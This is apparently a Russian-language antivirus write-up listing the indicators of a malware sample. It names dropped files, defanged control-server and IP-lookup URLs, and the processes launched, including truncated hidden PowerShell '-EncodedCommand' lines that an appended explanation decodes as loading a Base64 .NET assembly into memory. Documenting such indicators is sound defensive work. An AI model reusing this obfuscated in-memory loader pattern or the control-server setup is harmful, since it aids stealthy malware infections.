Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\vista.ini.lnk
- %APPDATA%\processlassosetup32.exe
- %APPDATA%\for.js
- %TEMP%\nsz10ac.tmp
- %TEMP%\nsu10dc.tmp\system.dll
- %TEMP%\nsu10dc.tmp\langdll.dll
- %HOMEPATH%\appdata\vista.js
- http://ip##fo.io/ip
- http://ip##fo.io/country
- http://ne##rim.top/bit/R.mp3
- http://ne##rim.top/gate.php
- DNS ASK ne##rim.top
- DNS ASK ip##fo.io
- '%APPDATA%\processlassosetup32.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\for.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
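- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...
  (Пояснение: значение параметра -e (сокращение от -EncodedCommand) в этой и предыдущей строке — текст в кодировке UTF-16LE, закодированный в Base64. Видимая часть декодируется в «  sleep 8; [AppDomain]::CurrentDomain.Load([Convert]::Frombase64Stri…»: судя по ней, после паузы в 8 секунд в память процесса PowerShell загружается .NET-сборка, переданная в виде Base64-строки. Команда на странице обрезана, поэтому сама сборка здесь не приведена.)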